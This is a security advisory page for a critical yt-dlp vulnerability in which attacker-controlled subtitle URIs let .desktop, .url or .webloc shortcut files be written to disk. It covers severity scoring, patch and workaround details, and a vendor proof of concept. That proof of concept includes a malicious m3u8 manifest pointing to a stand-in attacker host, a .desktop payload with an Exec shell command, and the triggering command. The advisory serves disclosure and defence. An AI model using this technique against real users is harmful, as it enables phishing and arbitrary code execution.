Skip to main content

yt-dlp EUVDEUVD-2026-38493

| CVE-2026-50023 CRITICAL
Improper Restriction of Names for Files and Other Resources (CWE-641)
2026-06-16 https://github.com/yt-dlp/yt-dlp GHSA-c6mh-fpjc-4pr3
9.6
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.6 CRITICAL
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
vuln.today AI
8.8 CRITICAL

Unauthenticated remote input (AV:N/PR:N) but requires a non-default option plus the user opening the file (UI:R); the reliable impact is an arbitrary file write (I:H, S:C), with C/A only partial since they hinge on the victim executing the shortcut.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

8
Analysis Updated
Jun 26, 2026 - 20:31 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 26, 2026 - 20:31 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 26, 2026 - 20:22 vuln.today
cvss_changed
Severity Changed
Jun 26, 2026 - 20:22 NVD
HIGH CRITICAL
CVSS changed
Jun 26, 2026 - 20:22 NVD
8.3 (HIGH) 9.6 (CRITICAL)
Source Code Evidence Fetched
Jun 16, 2026 - 21:42 vuln.today
Analysis Generated
Jun 16, 2026 - 21:42 vuln.today
CVE Published
Jun 16, 2026 - 20:59 github-advisory
HIGH 8.3

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 6 pypi packages depend on yt-dlp (6 direct, 0 indirect)

Ecosystem-wide dependent count for version 2026.6.9.

DescriptionNVD

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server: Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

m3u8
#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

ini
[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download: In this case, the generic extractor triggers the exploit if the --write-subs option is used:

bash
yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions

AnalysisAI

Arbitrary OS-shortcut file write in yt-dlp before 2026.06.09 lets a remote attacker plant malicious .desktop, .url, or .webloc files on a victim's machine, reviving the attack surface that CVE-2024-38519 was meant to close. Because numerous extractors derive output file extensions from attacker-controlled sources (e.g. an m3u8 EXT-X-MEDIA:TYPE=SUBTITLES URI), a user who downloads from a malicious URL with options like --write-subs will silently receive a shortcut file containing attacker-chosen shell commands or remote-executable links. A vendor proof-of-concept demonstrating code execution via a planted .desktop file is publicly available; it is not listed in CISA KEV, and EPSS is low at 0.54% (41st percentile).

Technical ContextAI

yt-dlp is a Python media downloader (PyPI package yt-dlp) that resolves output filenames partly from metadata supplied by remote servers and playlist manifests. The flaw is a CWE-641 issue (improper restriction of names for files and other resources): the CVE-2024-38519 remediation introduced an extension allowlist in _UnsafeExtensionError.sanitize_extension, but deliberately kept .desktop, .url, and .webloc globally allowed so the --write-link feature would keep working. OS-shortcut formats are not inert data - .desktop Desktop Entry files carry an Exec= directive, Windows .url/Linux launchers can point at remote executables - so allowing them globally meant any download path (subtitles, thumbnails, media) could emit them. The patch (commit e578e265) removes these three extensions from the global ALLOWED_EXTENSIONS set and threads an explicit _allowed_exts=tuple(LINK_TEMPLATES) only through the --write-link code path, so shortcut extensions are accepted solely when the user intentionally requests link-file output.

RemediationAI

Vendor-released patch: 2026.06.09 - upgrade yt-dlp to 2026.06.09 or later (release: https://github.com/yt-dlp/yt-dlp/releases/tag/2026.06.09; fix commit e578e265f7c6ca94a74b30e0d8d6196a4d19fb6a), which strips .url, .desktop, and .webloc from the global extension allowlist and permits them only inside the --write-link workflow. If you cannot upgrade immediately, the vendor advises doing all of the following: pass only fully trusted input URLs to yt-dlp; avoid --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, and --embed-thumbnail; and use --format - to interactively select formats and validate their file extensions before download. The trade-off is functional: disabling the subtitle/thumbnail options removes those convenience features, and interactive format selection breaks unattended/batch automation, so scripted pipelines may need rework. See GHSA-c6mh-fpjc-4pr3 for the authoritative guidance.

Vendor StatusVendor

SUSE

Product Status
openSUSE Tumbleweed Fixed

Share

EUVD-2026-38493 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy